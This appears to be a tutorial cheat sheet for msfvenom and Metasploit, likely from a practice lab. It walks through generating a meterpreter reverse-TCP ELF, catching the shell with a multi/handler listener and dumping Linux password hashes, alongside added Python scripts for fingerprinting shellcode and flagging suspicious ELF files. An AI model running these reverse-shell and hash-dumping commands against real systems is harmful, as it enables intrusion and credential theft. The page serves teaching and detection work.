Msfvenom

Help menu

$ msfvenom -h

List available options for module type

$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all

Payload option

$ msfvenom -p ...

# eg. 
$ msfvenom -p linux/x86/shell_reverse_tcp

Format option

$ msfvenom -f ...

# eg.
$ msfvenom -f elf
$ msfvenom -f exe
 

Note: The output from msfvenom is the shellcode (the raw machine-code bytes, typically assembled from an assembly-language stub) for the target architecture selected by the -p flag. The -f flag only chooses the output format in which those same bytes are emitted.

Eg. Powershell

[Byte[]] $buf = 0xfc,0x48,0x83,...

Eg. C

unsigned char buf[] = "\xfc\x48\x83...

Eg. Python

buf = b""
buf += b"\xfc\x48\x8
buf += b"\...

For these text formats, a script or program (in the chosen language) that loads and executes the shellcode emitted by msfvenom still has to be written; msfvenom only produces the bytes.
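The point above (same bytes, different wrapper) is what lets an analyst compare a byte array found inside a PowerShell, C or Python loader against a known sample regardless of the -f format that produced it. The following is an added example, not part of msfvenom or Metasploit: it strips the format-specific syntax from each of the three text formats shown above, recovers the raw bytes, and hashes them. The six byte values are constructed placeholders (only the first three match the page's truncated listings), not a real payload.

```python
"""Normalize msfvenom text formats (powershell, c, python) to raw bytes.

Added example, not msfvenom's own code. The byte values are constructed
placeholders, not a working payload.
"""
import hashlib
import re

# Constructed samples in the three text formats, all carrying the same six bytes.
PS_SAMPLE = "[Byte[]] $buf = 0xfc,0x48,0x83,0xcc,0xcc,0xc3"
C_SAMPLE = (
    'unsigned char buf[] = \n'
    r'"\xfc\x48\x83"' "\n"
    r'"\xcc\xcc\xc3";'
)
PY_SAMPLE = (
    'buf =  b""\n'
    r'buf += b"\xfc\x48\x83"' "\n"
    r'buf += b"\xcc\xcc\xc3"' "\n"
)

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")      # C / Python: "\xNN" string escapes
_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2})\b")  # PowerShell: 0xNN list elements


def extract_bytes(text: str) -> bytes:
    """Recover the payload bytes regardless of which -f text format produced them."""
    # Prefer "\xNN" escapes; fall back to 0xNN literals for the PowerShell layout.
    hexes = _ESCAPE.findall(text) or _LITERAL.findall(text)
    if not hexes:
        raise ValueError("no byte literals found")
    return bytes(int(h, 16) for h in hexes)


def fingerprint(text: str) -> str:
    """SHA-256 of the normalized bytes: identical for every text format of one payload."""
    return hashlib.sha256(extract_bytes(text)).hexdigest()


def same_payload(*texts: str) -> bool:
    """True when every listing normalizes to the same byte sequence."""
    return len({extract_bytes(t) for t in texts}) == 1


if __name__ == "__main__":
    for name, sample in (("powershell", PS_SAMPLE), ("c", C_SAMPLE), ("python", PY_SAMPLE)):
        print(f"{name:10s} {extract_bytes(sample).hex()}  {fingerprint(sample)[:16]}...")
    print("all formats carry the same bytes:", same_payload(PS_SAMPLE, C_SAMPLE, PY_SAMPLE))
```

The fingerprint only matches across formats, not across encodings: running the same payload through an encoder (the -e option, see `msfvenom -l encoders`) or with different options changes the bytes themselves, so a hash of the raw bytes catches re-wrapping, not re-encoding.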

Example

linux/x86/meterpreter/reverse_tcp

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf

Module to use on the attacking machine to catch a shell

exploit/multi/handler

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run

Run the shellcode on the target machine

# eg.
$ sudo ./shell.elf

Gain meterpreter shell on the attacker machine

meterpreter >
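From the defender's side, the artifact that lands on the target in the walkthrough above is `shell.elf`, an ELF produced with `-f elf`. The following is an added triage heuristic, not code from msfvenom or Metasploit, and it rests on an assumption about msfvenom's ELF template that should be verified against your own samples: the file is a minimal wrapper with no section headers and a single PT_LOAD segment marked readable, writable and executable. The script parses the ELF header and program headers (32- and 64-bit, little-endian) and flags files that show both hallmarks. It constructs its own tiny test ELFs whose body is inert `int3` padding, not a payload.

```python
"""Triage heuristic for minimal ELF wrappers such as msfvenom's -f elf output.

Added example (not msfvenom's or Metasploit's own code). Assumes the common
shape of msfvenom's ELF template: no section headers and one RWX PT_LOAD.
Stripped-to-the-bone legitimate binaries (e.g. after sstrip) can also lack
section headers, so treat a hit as a lead, not a verdict.
"""
import struct

PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
EHDR32, EHDR64 = "<16sHHIIIIIHHHHHH", "<16sHHIQQQIHHHHHH"
PHDR32, PHDR64 = "<8I", "<IIQQQQQQ"


def parse_elf(data: bytes) -> dict:
    """Parse the ELF header and program headers (little-endian, 32- or 64-bit)."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2  # EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64
    ehdr_fmt, phdr_fmt = (EHDR64, PHDR64) if is64 else (EHDR32, PHDR32)
    if len(data) < struct.calcsize(ehdr_fmt):
        raise ValueError("truncated ELF header")
    (_ident, _type, _machine, _ver, _entry, phoff, _shoff, _flags, _ehsize,
     phentsize, phnum, _shentsize, shnum, _shstrndx) = struct.unpack_from(ehdr_fmt, data, 0)
    segments = []
    for i in range(phnum):
        off = phoff + i * phentsize
        if off + struct.calcsize(phdr_fmt) > len(data):
            raise ValueError("program header table runs past end of file")
        fields = struct.unpack_from(phdr_fmt, data, off)
        if is64:   # Elf64_Phdr puts p_flags second
            p_type, p_flags, _o, _v, _p, p_filesz, p_memsz, _a = fields
        else:      # Elf32_Phdr puts p_flags seventh
            p_type, _o, _v, _p, p_filesz, p_memsz, p_flags, _a = fields
        segments.append({"type": p_type, "flags": p_flags,
                         "filesz": p_filesz, "memsz": p_memsz})
    return {"class": 64 if is64 else 32, "shnum": shnum, "segments": segments}


def assess(data: bytes) -> dict:
    """Return triage findings; 'suspicious' when both wrapper hallmarks are present."""
    info = parse_elf(data)
    findings = []
    if info["shnum"] == 0:
        findings.append("no_section_headers")
    loads = [s for s in info["segments"] if s["type"] == PT_LOAD]
    if any((s["flags"] & (PF_W | PF_X)) == (PF_W | PF_X) for s in loads):
        findings.append("rwx_load_segment")
    if len(loads) == 1:
        findings.append("single_load_segment")
    return {"class": info["class"], "size": len(data), "findings": findings,
            "suspicious": "no_section_headers" in findings and "rwx_load_segment" in findings}


def build_elf32(load_flags: int, shnum: int, body: bytes = b"\xcc" * 16) -> bytes:
    """Construct a tiny ELF32 test file (body is inert int3 padding, not a payload)."""
    base = 0x08048000
    ehsize, phsize, shsize = 52, 32, 40
    filesz = ehsize + phsize + len(body)
    shoff = filesz if shnum else 0              # zeroed section headers appended at the end
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    ehdr = struct.pack(EHDR32, ident, 2, 3, 1, base + ehsize + phsize, ehsize, shoff, 0,
                       ehsize, phsize, 1, shsize if shnum else 0, shnum, 0)
    phdr = struct.pack(PHDR32, PT_LOAD, 0, base, base, filesz, filesz, load_flags, 0x1000)
    return ehdr + phdr + body + b"\x00" * (shsize * shnum)


if __name__ == "__main__":
    wrapper = build_elf32(load_flags=PF_R | PF_W | PF_X, shnum=0)   # msfvenom-like shape
    normal = build_elf32(load_flags=PF_R | PF_X, shnum=3)            # conventional shape
    for name, blob in (("wrapper", wrapper), ("normal", normal)):
        print(name, assess(blob))
```

On a real host the same check can be pointed at a directory of files with `parse_elf(open(path, "rb").read())`; pair a hit with the outbound connection to the handler's LHOST:LPORT that a reverse_tcp payload makes, which is the network-side indicator of the flow shown above.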

Using post exploitation hash dump module

meterpreter > background
msf6 exploit(multi/handler) > sessions -l 

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         meterpreter x86/linux  ...                    ...

msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...
